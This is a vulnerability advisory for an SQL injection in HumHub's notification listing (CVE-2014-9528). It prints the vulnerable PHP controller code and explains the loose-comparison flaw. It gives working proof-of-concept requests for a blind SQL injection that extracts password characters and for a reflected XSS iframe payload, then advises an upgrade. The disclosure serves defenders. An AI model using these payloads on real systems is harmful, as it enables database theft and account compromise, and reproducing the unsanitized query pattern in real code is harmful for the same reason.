LEAKFREE-2014-005 / CVE-2014-9528

HumHub ListController::actionIndex() SQL Injection

[+] CVE: CVE-2014-9528
[+] LF-ID: LEAKFREE-2014-005
[+] CVSS: 7.5
[+] Vendor: HumHub
[+] Product: HumHub
[+] Versions affected: 0.10.0-rc1 and earlier

Vulnerability

The Humhub social networking kit versions 0.10.0-rc.1 and prior suffer from an SQL injection vulnerability, which has now been resolved in cooperation with the vendor [1], in its notification listing functionality allowing an attacker to obtain backend database access. In the actionIndex() function located in "/protected/modules_core/notification/controllers/ListController.php"


    /**
     * Returns a List of all notifications for an user
     */
    public function actionIndex()
    {
        // the id from the last entry loaded
        $lastEntryId = Yii::app()->request->getParam('from');
        // create database query
        $criteria = new CDbCriteria();
        if ($lastEntryId > 0) {
            // start from last entry id loaded
            $criteria->condition = 'id<' . $lastEntryId;
        }
        $criteria->order = 'seen ASC, created_at DESC';
        $criteria->limit = 6;
        // safe query
        $notifications = Notification::model()->findAllByAttributes(array('user_id' => Yii::app()->user->id), $criteria);
        // variable for notification list
        $output = "";
        foreach ($notifications as $notification) {
            // format and save all entries
            $output .= $notification->getOut();
            // get the id from the last entry
            $lastEntryId = $notification->id;
        }
        // build json array
        $json = array();
        $json['output'] = $output;
        $json['lastEntryId'] = $lastEntryId;
        $json['counter'] = count($notifications);
        // return json
        echo CJSON::encode($json);
        // compete action
        Yii::app()->end();
    }

[2] a check is performed on the unsanitized $lastEntryId variable (which is fetched from the 'from' GET parameter) to see if it is greater than 0. However, since PHP uses type-unstrict comparisons and $lastEntryId isn't guaranteed to be an integer, this allows an attacker to prefix their string of choice with any number of integers (so that $lastEntryId gets treated as an integer during the comparison) such that the comparison evaluates to true and $criteria->condition is injected with the otherwise unsanitized $lastEntryId, which can be any SQL injection.

Proof of Concept SQL Injection

Performing the following request


    index.php?r=notification/list/index&from=999) AND 
    ( CASE WHEN 0x30 < (
        SELECT substring(password,1,1) FROM user_password WHERE id = 1
    ) THEN 1 ELSE 0 END) 
    AND (1=1                  
    

Allows an attacker to perform a binary search SQL injection. In addition, the SQL error handling of the function in question allows the attacker to perform a reflected Cross-Site Scripting attack.

Proof of Concept Cross-site Scripting


        index.php/?r=notification/list/index&from=999) AND 
        ("<iframe src ='index.php/?r=user/auth/logout'>"=""
    

Mitigation

Upgrade to HumHub version 0.10.0 [2]

References

1. https://www.humhub.org/

2. https://github.com/humhub/humhub/releases/tag/v0.10.0

Contact

Voor meer informatie of een vrijblijvende offerte kunt u contact met ons opnemen via contact@leakfree.nl (PGP)